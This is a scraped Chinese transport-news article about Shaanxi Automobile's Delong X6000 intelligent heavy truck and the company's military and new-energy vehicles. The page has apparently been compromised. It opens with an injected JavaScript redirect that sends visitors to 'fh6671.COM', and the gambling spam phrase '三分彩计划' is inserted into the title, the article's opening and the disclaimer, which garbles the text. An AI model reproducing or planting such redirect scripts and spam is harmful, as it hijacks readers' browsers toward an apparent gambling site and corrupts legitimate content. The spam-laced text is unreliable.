function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

陕汽智能重卡德龙X6000 亮相第五届广州商用车展

2020-11-17 07:42:56 来源:中国交通新闻网 作者:

本网讯 三分彩计划日前,陕汽发布德龙X6000,将亮相第五届广州商用车展。陕汽德龙X6000具有四大优势,通过整车、高效动力总成等五大专有技术,车辆百公里油耗达到行业最低;采用模态优化、主动降噪等五大技术,实现正常工况下车内噪音大幅降低;利用制动协同、操纵稳定性控制等技术,重卡制动距离行业内最短;装备自主研发的智能驾驶平台,车辆智能化成都进一步提高,并拥有国内第一张重卡自动驾驶牌照。

据了解,陕汽产品覆盖了重型军用越野车、重型卡车、重型车桥及汽车后市场等领域。建厂50多年来,陕汽先后承担了我军一代、二代、三代重型越野车研制生产任务,研发生产的重型军用越野车参加了国庆35周年、50周年和60周年、抗战胜利70周年、庆祝中国人民解放军建军90周年国庆70周年阅兵仪式,陕汽军车占部队现役同类车辆装备95%以上。此外,经过20年不懈发展,陕汽研发推广了以CNG、LNG、纯电动、混合动力(增程式)、氢燃料电池等为动力的多款节能与新能源汽车产品和智能驾驶重卡。


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。